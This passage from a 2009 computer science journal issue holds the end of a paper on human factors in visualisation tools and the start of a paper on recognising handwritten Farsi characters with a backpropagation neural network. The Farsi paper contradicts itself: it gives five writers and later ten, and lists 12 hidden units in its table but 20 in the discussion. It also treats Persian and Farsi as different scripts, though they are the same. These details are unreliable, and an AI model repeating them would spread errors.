subset (browsing) or by a specification of properties of the
desired subset (querying). Browsing is very difficult for very
large data sets and querying often does not produce the desired
results. Therefore, a number of interaction techniques have
been developed to improve interactive filtering in data
exploration. Examples are Magic Lenses [26], InfoCrystal [27]
etc.3) Interactive Zooming
In dealing with large amounts of data, it is important to present
the data in a highly compressed form to provide an overview
of the data, but, at the same time, allow a variable display of
the data on different resolutions. Zooming not only means to
display the data objects larger, but also means that the data
representation automatically changes to present more details
on higher zoom levels. The objects may, for example, be
represented as single pixels on a low zoom level, as icons on
an intermediate zoom level, and as labeled objects on a high
resolution. Examples are: TableLens approach [28], PAD++
[29] etc.
4)
Interactive DistortionInteractive distortion techniques support the data exploration
process by preserving an overview of the data during drill-
down operations. The basic idea is to show portions of the data
with a high level of detail while others are shown with a lower
level of detail. Popular distortion techniques are hyperbolic
and spherical distortions, which are often used on hierarchies
or graphs, but may be also applied to any other visualization
technique. An example of spherical distortions is provided in
the Scalable Framework paper (see Fig. 5 in [23]). Other
49 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 56/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
examples are Bifocal Displays [30], Graphical Fisheye Views
[31] etc.
5) Interactive Linking and Brushing
The idea of linking and brushing is to combine different
visualization methods to overcome the shortcomings of single
techniques. It can be applied to visualizations generated by all
visualization techniques described above. As a result, the
brushed points are highlighted in all visualizations, making itpossible to detect dependencies and correlations. Interactive
changes made in visualization are automatically reflected in
the other visualization. Typical examples of visualization
techniques which are combined by linking and brushing are
multiple scatterplots, bar charts, parallel coordinates, pixel
displays, and maps. Most interactive data exploration systems
allow some form of linking and brushing. Examples are
Polaris [22], XGobi [25] and DataDesk [32].
Experiments with the real world problems showed that the
visualization can significantly increase the quality and
usefulness of web log mining results. However, how decision
makers perceive and interact with a visual representation can
strongly influence their understanding of the data as well asthe usefulness of the visual presentation. In section III we try
to explore the human aspects in visualization. In section IV we
discuss some research examples.
II. RELATED WORK
Most common technique of visualization is Graph drawing
and it has been subject of research since decades [5, 9].
Graphs are a natural means to model the structure of the web,
as the pages are represented by nodes and the links represented
by edges. Many graph algorithms are used, in original or
adapted form, to calculate and express properties of web sites
and individual pages [4, 7, 8]. Although to a lesser extent,
graph theoretic methods have also been applied to the usernavigation paths through web sites [10]. WebQuilt is a logging
and visualization system [11] which is interactive in the sense
that it provides semantic zooming and filtering, given a
storyboard. Webviz [2], VISVIP [3], VisualInsights [12] are
some other visualization tools. So many commercial
visualization tools for representing association rules have also
been developed. Some of them are MineSet [14] and QUEST
[13]. Becker [15, 16] describes a series of elegant visualization
techniques designed to support data mining of business
databases. Westphal et al. [17] give an excellent introduction
of visualization techniques provided by current data mining
tools. Cockburn and McKenzie [6] mention various issues
related to graphical representations of web browsers’
revisitation tools.
How a viewer perceives an item in a visualization display
depends on many factors, including lighting conditions, visual
acuity, surrounding items, color scales, culture, and previous
experience [18]. There are so many technical challenges in
developing a good visualization tool one of the big challenges
is User acceptability. Much novel visualization techniques
have been presented, yet their widespread deployment has not
taken place, because of user acceptability due to lack of visual
analytics approach. Many researchers have started their work
in this direction. An example is the IBM Remail project [20]
which tries to enhance human capabilities to cope with email
overload. Concepts such as “Thread Arcs”, “Correspondents
Map”, and “Message Map” support the user in efficiently
analyzing his personal email communication. MIT’s project
Oxygen [19] even goes one step further, by addressing the
challenges of new systems to be pervasive, embedded,
nomadic, adaptable, powerful, intentional and eternal. Usersare an integral part of the visualization process, especially
when the visualization tool is interactive. Rheingans suggests
that interaction should not be simply a “means to the end of
finding a good representation” [21]. Interaction itself can be
valuable since exploration may reveal insight that a set of
fixed images cannot. Human factors-based design involves
designing artifacts to be usable and useful for the people who
are intended to benefit from them. Unfortunately, this
principle is sometimes neglected in visualization systems.
III. HUMAN FACTORS
How people perceive and interact with a visualization tool can
strongly influence their understanding of the data as well asthe system’s usefulness. Human factors (e.g. interaction,
cognition, perception, collaboration, presentation, and
dissemination) play a key role in the communication between
human and computer therefore contribute significantly to the
visualization process and should play an important role in the
design and evaluation of visualization tools. Several research
initiatives have begun to explore human factors in
visualization.
A. Testing of Human Factors
There are so many Human Computer Interaction interfaces
available. Each interface is tested for its functionality
(usability study) and ease of interaction (user studies).
1) Ease of interaction
To test ease of interaction we consider only real users and
obtain both qualitative and quantitative data. Quantitative data
typically measures task performance e.g. time to complete a
specific task or accuracy e.g. number of mistakes. User ratings
on questions such as task difficulty or preference also provide
quantitative data. Qualitative data may be obtained through
questionnaires, interviews, or observation of subjects using the
system.
Walenstein [45] describes several challenges with formal
user studies. According to him the main problem in the user
studies is that we studies so many users but the true facts about
the ease and benefits can be told only by the experts who can
be difficult to find or may not have time to participate inlengthy studies. Another problem is that missing or
inappropriate features in the test tool or problems in the
interface can easily dominate the results and hide benefits of
the ideas we really want to test. Thus, it seems that user
studies can only be useful with an extremely polished tool so
that huge amounts of time must be invested to test simple
ideas that may not turn out to be useful. One solution to this
problem is to have user studies focus on design ideas rather
50 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 57/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
than complete visualization tools and to test specific
hypotheses [45]. Our test should attempt to validate 1) whether
the idea is effective and 2) why it is or is not effective. Of
course, this may not be as easy as it sounds.
2) Usability Study
Additional evaluation methods established in Human
Computer Interaction include cognitive walk-throughs (where
an expert “walks through” a specific task using a prototype
system, thinking carefully about potential problems that couldoccur at each step) and heuristic evaluations (where an expert
evaluates an interface with respect to several predefined
heuristics) [42]. Similarly, Blackwell et al. describe cognitive
dimensions, a set of heuristics for evaluating cognitive aspects
of a system [34], and Baldonado et al. designed a set of
heuristics specific to multiple view visualizations [33]. These
usability inspection methods avoid many of the problems with
user studies and may be beneficial for evaluating
visualizations. However, because these techniques are (for the
most part) designed for user interface testing, it is not clear
how well they will evaluate visualization ideas. For example,
many visualization tasks are ill-defined. Walking through a
complex cognitive task is very different from walking througha well-defined interface manipulation task. Furthermore, by
leaving end users out of the evaluation process, usability
inspection methods limit our ability to find unexpected errors.
Figure 6. Visualization Design cycle
B. User-Centered Design
User-centered design is an iterative process involving task
analysis, design, prototype implementation, and testing, as
illustrated in Fig. 6. Users are involved as much as possible at
each design phase. Development may start at any position in
the cycle, but would typically start with an analysis of the
tasks the system should perform or testing of an existing
system to determine its faults and limitations. User-centered
design is more a philosophy than a specific method. Although
it is generally accepted in human computer interaction, we
believe this approach is not currently well-known in
visualization and could support better visualization design.
Various aspects of human factors-based design have been
incorporated into visualization research and development. We
provide examples of these contributions throughout the next
section.
IV. RESEARCH EXAMPLES
Adoption of human factors methodology and stringent
evaluation techniques by the visualization community is in its
infancy. A number of research groups have begun to consider
these ideas and incorporate them into the design process to
greater or lesser extents. This section will summarize these
human factors contributions.
A. Improving Perception in Visualization SystemsSeveral papers have looked at how our knowledge of
perception can be used to improve visualization designs. For
example, depth of focus is the range of distances in which
objects appear sharp for a particular position of the eye’s lens.
Objects outside this range will appear blurry. Focusing effects
can be used to highlight information by blurring everything
except the highlighted objects [40]. For example, in computer
games like road race the objects that are to be shown far are
blurred giving the impact that object are far away and as the
bike moves forward the blurring effect is reduced gradually
giving impact of bike reaching near to the objects. Similarly in
GIS application, all routes between two cities except for the
shortest one could be blurred to highlight the best route. Here,the goal of blurring is to highlight information, not to focus on
objects in the center of a user’s field of view. Hence, the
blurred objects are not necessarily at similar depths, a
difference from traditional “depth of focus” effects. Figure 7
and 8, showing how perception can be improved by blurring.
Figure 7. Improving perception by blurring long distance objects
Figure 8. Improving perception by blurring
51 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 58/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
Figure 9. Perceptual Model
Figure 10. Fisheye distortion
B. Interaction Metaphors
Interacting with 3D visualizations can be challenging because
mapping movements of a 2D mouse to actions in 3D space is
not straightforward. Research has shown that manipulating
objects relative to each other is easier than using absolute
coordinates [37]. In addition, interaction may be easier when
the interface is directly related to the task through task-specific
props. Examples of task-specific props for visualization are: a
physical model head and clip plane that aid interaction with
volumetric brain data [38] and the “Cubic Mouse,” a 3D input
device for volume data that allows users to navigate alongmajor axes by moving three perpendicular rods in a physical
box [36]. Development of task-specific input devices for other
visualization applications (e.g., flow visualization) could make
interaction easier and thereby enhance data analysis.
In addition to the interactive hardware some
interactive programming/presentation effort should be done
for such a task like manipulating windows and widgets,
navigating around interfaces and managing data, these tasks
are called maneuvering. For example, an analyst examining user
access to a website may begin by examining several visual images.
Generating these images may require manipulation of several
windows and widgets within the visualization tool. If the analyst
then decides to examine the data quantitatively, he or she may
need to return to the original window to look up values and/or
switch to a different computer program in order to perform a
mathematical analysis or generate statistics. These maneuvering
operations are time consuming and distract users from their
ultimate goals; thus, some necessary tools for these tasks should
be integrated with the visualization tool to minimizing
unnecessary navigation.
C. Perceptual Models for Computer Graphics
Various mathematical models of visual perception are
available today. Typical models approximate contrast
sensitivity, amplitude nonlinearity (sensitivity changes with
varying light level), and masking effects of human vision.
Two examples are the Daly Visual Differences Predictor [35]
and the Sarnoff Visual Discrimination Model [41]. Variations
on these models have been used for realistic image synthesis.
Improving realism is not too much important in visualization
because emphasis is not on representing the real world image
but on representing data for the analysis purpose. Applications
more relevant to visualization include increasing rendering
speed (to enable interactive data exploration) and reducing
image artifacts (to enhance perception and prevent incorrect
interpretations of data). Reddy removed imperceptible details
to reduce scene complexity and improve rendering speed [43].
D. Transfer Functions
In direct volume rendering, each voxel (sample in a 3D
volume grid) is first classified as belonging to a particular
category based on its intensity and/or spatial gradient value(s).
Voxels are then assigned a color and transparency level basedon this classification. The function that does this is called a
transfer function. One example in Computed Tomography
(CT) data would be to make skin semitransparent and bones
opaque so the bones could be seen beneath the skin. In this
case, transfer function design is quite easy since bones and
skin have very different intensity values in CT data and can be
easily distinguished. However, in general, finding good
transfer functions is difficult and is therefore a major research
area in volume visualization.
E. Detail and Context Displays (Distortion)
Resolution of the computer monitor is limited. Only a limited
number of graphic items can be displayed at one time.
Displaying more items often means displaying less detail
about each item. If all items are displayed, few details can be
read, but if only a few items are shown, we can lose track of
their global location. Interactive distortion techniques support
the data exploration process by preserving an overview of the
data during drill-down operations. The basic idea is to show
portions of the data with a high level of detail while others are
shown with a lower level of detail.
F. User and Computer Cooperation
Computers can easily store and display data, but humans are
better at interpreting data and making decisions. Although this
idea is very useful, it is possible for computers to play a more
active role in the visualization process than simply presentingdata and providing an interface for data manipulation. As
viewers look at images, they compare the image with their
existing mental model of the data and presentation method and
adjust either their mental model or their understanding of the
image if the two conflict.
For complex data, constructing a mental model requires
interaction and time since all the data cannot be seen in a
single view. Allowing users to write down and manipulate
their mental models, ideas, and insight (e.g., as mind maps)
52 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 59/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
could reduce demands on human memory and help users
identify new patterns or relationships.
V. CONCLUSION AND FUTURE WORK
Scientists are utilizing visualization tools for doing data
analysis in several disciplines. But the current visualization
tools did not support “integration of insight,” an important
data analysis task involving taking notes, recording and
organizing ideas and images, keeping track of the data analysishistory, and sharing ideas with others. Overall, visualization
systems could play several roles:
(a). Visually represent data to enhance data analysis,
(b). Visually display users’ mental models, interpretations of
the data, ideas, hypotheses, and insight,
(c). help users to improve their mental models by finding
supporting and contradictory evidence for their
hypotheses, and
(d). help users organize and share ideas.
Current research in visualization is almost exclusively devoted
to the first objective. Research into the others has not been
greatly explored and could make a valuable addition to data
analysis tools. In the above study we identify several specificdirections for future work. These are
• How to integrate human factors (perception and cognition
theories) in the visualization techniques?
• Developing and evaluating task-specific input devices to
aid interaction,
• Developing tools that provide cognitive support for
insight and organization of ideas.
ACKNOWLEDGMENT
Author is grateful to the technical reviewers for thecomments, which improved the clarity and presentation of thepaper.
REFERENCES
[1] Banissi, E., “Information Visualization”. Encyclopedla of computerscience and technology, 2000. Vol. 42(27).
[2] J. Pitkow and Krishna K. Bharat. “Webviz: A tool for world wide webaccess log analysis”. In First International WWW Conference, 1994.
[3] Cugini, J. and J. Scholtz. VISVIP: 3D Visualization of Paths throughWeb Sites. In Proceedings of International Workshop on Web-BasedInformation Visualization (WebVis '99). Florence, Italy: IEEE ComputerSociety, 1999.
[4] Baldi, P., Frasconi, P. and Smith, P. “Modeling the Internet and theWeb: Probabilistic Methods and Algorithms”. Wiley, ISBN 0-470-84906-1, (2003).
[5] Chen, C. “Information Visualisation and Virtual Environments”.Springer-Verlag, ISBN 1-85233-136-4, (1999).
[6] Cockburn, A. and McKenzie, B. “What Do Web Users Do? AnEmpirical Analysis of Web Use”. Intl. J. Human-Computer Studies 54(6), (2000). 903-922.
[7] Herder, E. and Juvina, “I. Discovery of Individual Navigation Styles”.Proc. of Workshop on Individual Differences in Adaptive Hypermedia atAdaptive Hypermedia 2004 (2004).
[8] Herder,E. and Van Dijk, B. “Site Structure and User Navigation:Models, Measures and Methods”. In Adaptable and AdaptiveHypermedia Systems, edited by S.Y. Chen and G.D. Magoulas, (2004),19-34.
[9] Herman, I., Melançon, G. and Marshall, M.S. “Graph Visualization andNavigation in Information Visualization: A Survey”. IEEE Trans.Visualization and Computer Graphics 6 (1), (2000), 24-43.
[10] McEneaney, J.E. “Visualizing and Assessing Navigation in Hypertext”.Proc. Hypertext ’99, (1999), 61-70.
[11] Waterson, S.J., Hong, J.I., Sohn, T. and Landay, J.A. “What Did TheyDo? Understanding Clickstreams with the WebQuilt VisualizationSystem”. Proc. Advanced Visual Interfaces (2002).
[12] VisualInsights. eBizinsights. 2001. http://www.visualinsights.com.
[13] http://www.almaden.ibm.com/cs/quest/publications.ht /ml#associations[14] http://www.sgi.com/software/mineset
[15] Barry G. Becker. Volume Rendering for Relational Data. In John Dilland Nahum Gershon, editors, Proceedings of Information Visualization‘97 , pages 87-90, Phoenix, Arizona, October 20 - 21, 1997. IEEEComputer Society Press.
[16] Barry G. Becker. Visualizing Decision Table Classifiers. In GrahamWills, and John Dill, editors, Proceedingsof Information Visualization
‘98, pages 102-105, Research Triangle Park, North Carolina, October 19-20, 1998. IEEE Computer Society Press.
[17] Christopher Westphal and Teresa Blaxton. Data mining solutions -Methods and Tools for Solving Real-Word Problems, New York, 1998.John Wiley and Sons, Inc.
[18] C. Ware, Information Visualization: Perception for Design. SanFrancisco: Morgan Kaufmann (Academic Press), 2000.
[19]
MIT Project Oxygen. http://oxygen.lcs.mit.edu/.[20] S. L. Rohall, D. Gruen, P. Moody, M. Wattenberg, M. Stern, B. Kerr, B.
Stachel, K. Dave, R. Armes, and E. Wilcox. Remail: a reinvented emailprototype. In Extended abstracts of the 2004 Conference on HumanFactors in Computing Systems,CHI 2004, Vienna, Austria, April 24 - 29,2004, pages 791–792, 2004.
[21] P. Rheingans, “Are We There Yet? Exploring with DynamicVisualization,” IEEE Computer Graphics and Applications, vol. 22, no.1, pp. 6-10, Jan./Feb. 2002.
[22] D. Tang, C. Stolte, and P. Hanrahan, “Polaris: A System for Query,Analysis and Visualization of Multidimensional Relational Databases”,IEEE Trans. Visualization and Computer Graphics, vol. 8, no. 1, pp. 52-65, Jan.-Mar. 2002.
[23] N. Lopez, M. Kreuseler, and H. Schumann, “A Scalable Framework forInformation Visualization,” IEEE Trans. Visualization and ComputerGraphics, vol. 8, no. 1, pp. 39-51, Jan.-Mar. 2002.
[24] D. Asimov, “The Grand Tour: A Tool for Viewing MultidimensionalData,” SIAM J. Science & Statistical Computing, vol. 6, pp. 128-143,1985.
[25] D.F. Swayne, D. Cook, and A. Buja, “User's Manual for XGobi: ADynamic Graphics Program for Data Analysis,” Bellcore technicalmemorandum, 1992.
[26] E.A. Bier, M.C. Stone, K. Pier, W. Buxton, and T. DeRose, “Toolglassand Magic Lenses: The See-Through Interface,” Proc. SIGGRAPH '93,pp. 73-80, 1993.
[27] A. Spoerri, “Infocrystal: A Visual Tool for Information Retrieval,” Proc.Visualization '93, pp. 150-157, 1993.
[28] R. Rao and S.K. Card, “The Table Lens: Merging Graphical andSymbolic Representation in an Interactive Focus+Context Visualizationfor Tabular Information,” Proc. Human Factors in Computing SystemsCHI 94 Conf., pp. 318-322, 1994.
[29] B.B. Bederson and J.D. Hollan, “Pad++: A Zooming Graphical Interfacefor Exploring Alternate Interface Physics,” Proc. Seventh Ann. ACMSymp. User Interface Software and Technology (UIST), pp. 17-26,1994.
[30] R. Spence and M. Apperley, “Data Base Navigation: An OfficeEnvironment for the Professional,” Behaviour and InformationTechnology, vol. 1, no. 1, pp. 43-54, 1982.
[31] G. Furnas, “Generalized Fisheye Views,” Proc. Human Factors inComputing Systems CHI 86 Conf., pp. 18-23, 1986.
[32] P.F Velleman, Data Desk 4.2: Data Description. Ithaca, N.Y.: DataDesk, 1992.
53 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 60/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009[33] M.Q.W. Baldonado, A. Woodruff, and A. Kuchinsky, “Guidelines for
Using Multiple Views in Information Visualization,” Proc. WorkingConf. Advanced Visual Interfaces, pp. 110-119, 2000.
[34] A.F. Blackwell et al., “Cognitive Dimensions of Notations: DesignTools for Cognitive Technology,” Proc. Cognitive Technology, pp. 325-341, 2001.
[35] S. Daly, “The Visible Differences Predictor: An Algorithm for theAssessment of Image Fidelity,” Digital Images and Human Vision, A.B.Watson, ed., pp. 179-206, Cambridge, Mass.: MIT Press, 1993.
[36]
B. Fro¨hlich et al., “Cubic-Mouse-Based Interaction in VirtualEnvironments,” IEEE Computer Graphics and Applications, vol. 20, no.4, pp. 12-15, July/Aug. 2000.
[37] K. Hinckley et al., “A Survey of Design Issues in Spatial Input,” Proc.ACM Symp. User Interface Software and Technology, pp. 213-222,1994.
[38] K. Hinckley et al., “Passive Real-World Interface Props forNeurosurgical Visualization,” Proc. Conf. Human Factors in ComputingSystems, pp. 452-458, 1994.
[39] V. Interrante, H. Fuchs, and S.M. Pizer, “Conveying the 3D Shape of Smoothly Curving Transparent Surfaces via Texture,” IEEE Trans.Visualization and Computer Graphics, vol. 3, no. 2, pp. 98-117, Apr.-June 1997.
[40] R. Kosara, S. Miksch, and H. Hauser, “Semantic Depth of Field,” Proc.IEEE Symp. Information Visualization, pp. 97-104, 2001.
[41] J. Lubin, “A Visual Discrimination Model for Imaging System Design
and Evaluation,” Vision Models for Target Detection and Recognition,E. Peli, ed., pp. 245-283, World Scientific, 1995.
[42] R.L. Mack and J. Nielsen, “Usability Inspection Methods: ExecutiveSummary,” Readings in Human-Computer Interaction: Toward the Year2000, second ed., R.M. Baecker et al., eds., pp. 170-181, San Francisco:Morgan Kaufmann, 1995.
[43] M. Reddy, “Perceptually Optimized 3D Graphics,” IEEE ComputerGraphics and Applications, vol. 21, no. 5, pp. 68-75, Sept./Oct. 2001.
AUTHORS PROFILE
Ratnesh Kumar Jain is Ph. D. student at Dr. H. S. GourCentral University (formerly, Sagar University) Sagar, M
P, India. He completed his bachelor’s degree in Science
(B. Sc.) with Electronics as special subject in 1998 and
master’s degree in computer applications (M.C.A.) in 2001from Dr. H. S. Gour University, Sagar, MP, India. His
field of study is Operating System, Data Structures, Web
mining, and Information retrieval. He has published more
than 5 research papers and has authored a book.
Suresh Jain completed his bachelor’s degree in civil
engineering from Maulana Azad National Institute of Technology (MANIT) (formerly, Maulana Azad College
of Technology) Bhopal, M.P., India in 1986. He
completed his master’s degree in computer engineering
from S.G. Institute of Technology and Science, Indore in1988, and doctoral studies (Ph.D. in computer science)
from Devi Ahilya University, Indore. He is professor of
Computer Engineering in Institute of Engineering & Technology (IET), Devi
Ahilya University, Indore. He has experience of over 21 years in the field of
academics and research. His field of study is grammatical inference, machine
learning, web mining, and information retrieval. He has published more than25 research papers and has authored a book.
R. S. Kasana completed his bacholar’s degree in 1969 from MeerutUniversity, Meerut, UP, India. He completed his master’s degree in Science
(M.Sc.-Physics) and master’s degree in technology (M. Tech.-Applied Optics)
from I.I.T. New Delhi, India. He completed his doctoral and post doctoral
studies from Ujjain University in 1976 in Physics and from P. T. B.Braunschweig and Berlin, Germany & R.D. Univ. Jabalpur correspondingly.He is a senior Professor and HoD of Computer Science and Applications
Department of Dr. H. S. Gour University, Sagar, M P, India. During his
tenure he has worked as vice chancellor, Dean of Science Faculty, Chairman
Board of studies. He has more than 34 years of experience in the field of academics and research. Twelve Ph. D. has awarded under his supervision and
more than 110 research articles/papers has published.
54 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 61/215
Handwritten Farsi Character
Recognition using Artificial Neural Network
Reza gharoie ahangar, Azad University.The master of business administration
of Islamic Azad University - Babol branch &
Membership of young researcher club, Iran.r.gharoie@gmail.com
Mohammad Farajpoor Ahangar,Babol University. University of medical sciences of Babol, Iran. &
Membership of young researcher club, Iran
fraj.ahangar@yahoo.com
.
Abstract-Neural Networks are being used for character
recognition from last many years but most of the work was
confined to English character recognition. Till date, a very little
work has been reported for Handwritten Farsi Character
recognition. In this paper, we have made an attempt to recognize
handwritten Farsi characters by using a multilayer perceptron
with one hidden layer. The error backpropagation algorithm has
been used to train the MLP network. In addition, an analysis has
been carried out to determine the number of hidden nodes to
achieve high performance of backpropagation network in the
recognition of handwritten Farsi characters. The system has been
trained using several different forms of handwriting provided by
both male and female participants of different age groups.
Finally, this rigorous training results an automatic HCR system
using MLP network. In this work, the experiments were carried
out on two hundred fifty samples of five writers. The results
showed that the MLP networks trained by the error
backpropagation algorithm are superior in recognition accuracy
and memory usage. The result indicates that the backpropagation
network provides good recognition accuracy of more than 80% of
handwritten Farsi characters.
Key Words: Farsi character recognition, neural networks,
multilayer perceptron (MLP) back propagation algorithm.
I. INTRODUCTION
Handwritten character recognition is a difficult problem due to the great variations of writing styles, different
size and orientation angle of the characters. Maybe among
different branches of handwritten character recognition, it iseasier to recognize Persian alphabets and numerals than Farsi
characters. There have been only a few attempts made in the
past to address the recognition of handwritten Farsi Characters
[2].Character recognition is an area of pattern recognition that
has been the subject of considerable research during the lastsome decades. Many reports of character recognition of several languages, such as Chinese [7], Japanese, English [3,
14, 15], Arabic [10, 11] and Farsi [5] have been published butstill recognition of handwritten Farsi characters using neural
networks is an open problem. Farsi is a first official Iranian
language and it is widely used in many Iranian states. In many
Iranian offices such as passport, bank, sales tax, railway,
embassy, etc.: the Farsi languages are used. Therefore, it is a
great importance to develop an automatic character
recognition system for Farsi language [5].In this paper, we
exploit the use of neural networks for off-line Farsihandwriting recognition. Neural networks have been widely
used in the field of handwriting recognition [6, 8]. The present
work describes a system for offline recognition of Farsi script,
a language widely spoken in Iran. In this paper, we presentMLP network for the handwritten Farsi character recognitionand develop an automatic character recognition system using
this network.
II. FARSI LANGUAG
Farsi, which is a Iranian language, is one of the oldest
languages in the world. There are 32 characters in Farsilanguage and is written from right to left. A set of handwritten
Farsi character is shown in Figure1.
Figure1. A set of Handwritten Farsi Characters [5]
III. PREPROCESSING
The handwritten character data samples were
acquired from various students and faculty members both male
and female of different age groups. Their handwriting was
sampled on A4 size paper. They were scanned using flat-bedscanner at a resolution of 100dpi and stored as 8-bit grey scale
images. Some of the common operations performed prior to
recognition are smoothing, thresholding and skeletonization[2].
A. Image Smoothing
The task of smoothing is to remove unnecessarynoise present in the image. Spatial filters could be used. To
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
55 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 62/215
reduce the effect of noise, the image is smoothed using a
Gaussian filter [2].
B. Skeletonization
We have initialized the mouse in graphics mode sothat a character can be directly written on screen. The
skeletonization process has been used to binary pixel image
and the extra pixels which do not belong to the backbone of
the character, were deleted and the broad strokes were reducedto thin lines. Skeletonization process is illustrated in Figure2.
A character before and after skeletonization is shown in Figure2a and 2b respectively [1].
C. Normalization
After skeletonization process, we used a
normalization process, which normalized the character into
30x30-pixel character and it was shifted to the left and upper corner of pixel window. The final skeltonized and normalized
character is shown in Figure 2c, which was used as an input of
the neural network. The Skeletonization and Normalization
process were used for each character [1].
Figure2. Skeletonization and Normalization process of a Farsi
characters [1].
IV. NEURAL NETWORK
A. Recognition
Recognition of handwritten letters is a very complex
problem. The letters could be written in different size,
orientation, thickness, format and dimension. These will giveinfinity variations. The capability of neural network to
generalize and be insensitive to the missing data would be
very beneficial in recognizing handwritten letters. The proposed Farsi handwritten character recognition system uses
a neural network based approach to recognize the characters.
Feed forward Multi Layered Perceptron (MLP) network with
one hidden layer trained using back-propagation algorithm has
been used to recognize handwritten Farsi characters [1, 2].
B. Structure Analysis of Backpropagation Network
The recognition performance of the Backpropagationnetwork will highly depend on the structure of the network
and training algorithm. In the proposed system,
Backpropagation algorithm has been selected to train thenetwork. It has been shown that the algorithm has much better
learning rate. The number of nodes in input, hidden and output
layers will determine the network structure. The best network
structure is normally problem dependent, hence structure
analysis has to be carried out to identify the optimum structure
[2]. We have used multilayer perceptron trained by Error Backpropagation (EBP) neural network classification
technique [1]. A brief description of this network is presented
in this section.
C. Multilayer Perceptron Network
The Multilayer Perceptron Network may be formed by simply cascading a group of single layer perceptron
network; the output of one layer provides the input to the
subsequent layer [16, 17]. The MLPN with the EBP algorithm
has been applied to the wide variety of problems [1-17]. Wehave used a two-layer perceptron i.e. single hidden layer and
output layer. A structure of MLP network for Farsi character recognition is shown in Figure3.
ي
Figure3. Multilayer Perceptron Network [1]
The activation function of a neuron j can beexpressed as:
F j(x) = 1/ (1+e-net), where net = ∑WijOi (1)
Where Oi is the output of unit i, Wij is the weight from unit i to
unit j.The generalized delta rule algorithm [1, 16, and 17] has
been used to update the weights of the neural network in order
to minimize the cost function:
E = ½ (∑ (D pk -O pk ))2 (2)
Where D pk and O pk are the desired and actual values,
respectively, of the output unit k and training pair p.Convergence is achieved by updating the weights by using the
following formulas:
Wij (n+l) =Wij (n) +∆Wij (n) (3)
∆Wij (n) =ηδXJ +α (Wij (N)-Wij (n-1) (4)
Where η is the learning rate, α is the momentum, Wij (n) is
the weight from hidden node i or from an input to node j at nth
iteration, Xi is either the output of unit i or is an input, and δ j isan error term for unit j. If unit j is an output unit, then
δ j = O j (1-O j) (D j-O j) (5)If unit j is an internal hidden unit, then
δ j = O j (1-O j) ∑ δk Wkj.. (6)
V. EXPERIMENTAL RESULTA. Character Database
We have collected 250 samples of handwritten Farsi
characters written by ten different persons 25 each directly onscreen. We have used 125 samples as a training data (training
set) and remaining 125 samples as a test data (test set).
B. Character Recognition with MLPNWe have implemented an automatic handwritten Farsi
character recognition system using Multi- Layer Perceptron
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
56 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 63/215
(MLP) network in C/C++ language. A complete system may
be shown in Figure 4.
We have initialized the mouse in graphics mode due
to which we can write directly on screen with mouse. Once
character has been written on screen, it is converted into
binary pixels. After that, we perform a normalization process
that converts the character represented in binary form into
30x30 bits. In next step, we compress the 30x30 bits into10x10 bits. After that we apply neural network classifier in
order to recognize the Farsi character. We have coded the
Farsi character and made the Backpropagation neural network
to achieve the coded value i.e. Supervised learning. For example for the character (ۑ), we have code 1 and made the
network to achieve this value by modifying the weight
functions repeatedly. Each MLP network uses two-layer feedfomard network [4] with nonlinear sigmoidal functions.
Many experiments with the various numbers of hidden units
for each network were carried out. In this paper, we have
taken one hidden layer with flexible number of neurons andoutput layer with 05 neurons because we have collected the
samples from (ۑ) to )الف( . The network has been trained using
the EBP algorithm as described in Section 4 and was traineduntil mean square error between the network output and
desired output falls bellow 0.05. The weights were updated
after each pattern presentation. The learning rate and
momentum were 0.2 and 0.1 respectively. The results areshown in following Table1.
Handwritten
Characters
Binary
Character
Normalization
30x30 bits
Pattern
Recognition
Skeletonization
and
Normalization
Character conversion into
Pixels (1 or0)
Output
Clasifier
MLPN
Compress into
10x10 bitsCompression
Figure4: A System for Farsi Character Recognition
RecognitionAccuracy (%)
Inputof the
MLPN
No. of hidden
units
No.of
iteration
Training
time(s)
Training
Data
Test
Data
12 200 1625 100 80
24 200 3125 100 8530x30
36 200 4750 100 80
Table 1.Results of handwritten Farsi characters using MLPN
This table indicates network results for different
states. For MLP network with 20,24 and 36 neurons in middle
layer and with equal iteration, you will observe different
quantities for predicting precision, and we see that network with 24 neurons give us response equal with 85 in test series,
which is the most desirable answer than the others.
VI. DISCUSSION
The results presented in previous subsections shows
that 24 hidden units give the best performance on training set
and test set for MLP network. The MLP networks takes longer training time because they use iterative training algorithm such
as EBP, but shorter classification time because of simple dot-
product calculations.
Here we should point to this issue that network withmore neurons in the middle layer is not a better measure for
network functioning, as we see that with increased neurons of
middle layer, there is no improvement in the response of network.
VII. CONCLUSION
In this paper, we have presented a system for
recognizing handwritten Farsi characters. An experimentalresult shows that backpropagation network yields good
recognition accuracy of 85%.
The methods described here for Farsi handwrittencharacter recognition can be extended for other Iranian scripts
by including few other preprocessing activities. We have
demonstrated the application of MLP network to the
handwritten Farsi character recognition problem. The
skeletonized and normalized binary pixels of Farsi cliaracterswere used as the inputs of the MLP network.
In our further research work, we would like to
improve the recognition accuracy of network for Farsicharacter recognition by using more training samples written
by one person and by using a good feature extraction system.
The training time may be reduced by using a good feature
